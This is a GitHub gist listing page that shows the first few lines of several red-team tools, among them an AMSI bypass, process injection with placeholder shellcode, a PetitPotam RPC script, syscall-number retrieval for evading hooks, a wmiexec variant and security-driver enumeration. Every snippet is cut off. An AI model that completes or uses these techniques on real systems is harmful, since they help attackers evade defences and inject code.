X-C3LL
/ FreshyCalls-VBA.vba
Created
September 4, 2022 23:51
Retrieving SSN for syscalling in VBA following FreshyCalls technique
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Proof of Concept: retrieving SSN for syscalling in VBA | |
| ' Author: Juan Manuel Fernandez (@TheXC3LL) | |
| 'Based on: | |
| 'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | |
| 'https://www.crummie5.club/freshycalls/ | |
| Private Type LARGE_INTEGER |
leechristensen
/ PetitPotam.ps1
Created
July 30, 2021 21:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install-Module NtObjectManager | |
| Import-Module NtObjectManager | |
| $Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll ` | |
| -DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | |
| $EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' } | |
| $client = Get-RpcClient -Server $EfsInterace | |
| $client.Connect() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Dictionary to hold superclass names | |
| $superClass = @{} | |
| # List to hold class names that inherit from container and are allowed to live under computer object | |
| $vulnerableSchemas = [System.Collections.Generic.List[string]]::new() | |
| # Resolve schema naming context | |
| $schemaNC = (Get-ADRootDSE).schemaNamingContext | |
| # Enumerate all class schemas |
TheWover
/ process_list_without_handles.cpp
Created
June 2, 2021 21:03
— forked from lpBunny/process_list_without_handles.cpp
List process information including process architecture and username without opening any handles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * | |
| * List process information on windows without opening any handles, including process architecture and username | |
| * | |
| */ | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #include <math.h> |
jthuraisamy
/ loaded_psp_drivers.cpp
Last active
October 15, 2023 03:01
Loaded Security Product Drivers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <ImageHlp.h> | |
| #include <strsafe.h> | |
| #include "loaded_psp_drivers.h" | |
| #include <set> | |
| #include <string> | |
| #include <algorithm> | |
| #pragma comment(lib, "crypt32.lib") |
NtRaiseHardError
/ imagine-needing-writeprocessmemory-and-createremotethread.c
Last active
June 28, 2022 15:47
Process injection without WriteProcessMemory or CreateRemoteThread/QueueUserApc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| // example shellcode | |
| // make sure to have 8 reserved bytes for 64-bit ret | |
| // gadget to rop into the actual shellcode | |
| CHAR shellcode[] = { | |
| // 8 bytes here for jmp loop gadget | |
| 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, | |
| // actual shellcode starts here | |
| 0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -TypeDefinition @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Principal; | |
| public static class Advapi32 | |
| { | |
| [DllImport("advapi32.dll", SetLastError = true)] | |
| public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken); | |
| [DllImport("advapi32.dll", SetLastError=true)] |
shelld0n
/ wmiexec_server_mode.py
Created
September 20, 2019 15:25
Impacket wmiexec.py implementation supporting SERVER mode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
| # | |
| # This software is provided under under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # A similar approach to smbexec but executing commands through WMI. | |
| # Main advantage here is it runs under the user (has to be Admin) | |
| # account, not SYSTEM, plus, it doesn't generate noisy messages |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <iostream> | |
| LPVOID lpJmpRealloc = nullptr; | |
| DWORD Backup_Eax, Handle, Address_1, New, Old, *DwSizee; | |
| const DWORD_PTR __declspec(naked) GetGateAddress() | |
| { | |
| __asm | |
| { |
TheWover
/ AMSIScanBufferBypass.cs
Last active
October 5, 2021 11:20
Working full program for AMSIScanBufferBypass from Cyber Ark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace AMSIBypass2 | |
| { | |
| class Program | |
| { | |
| [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
| static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); |
NewerOlder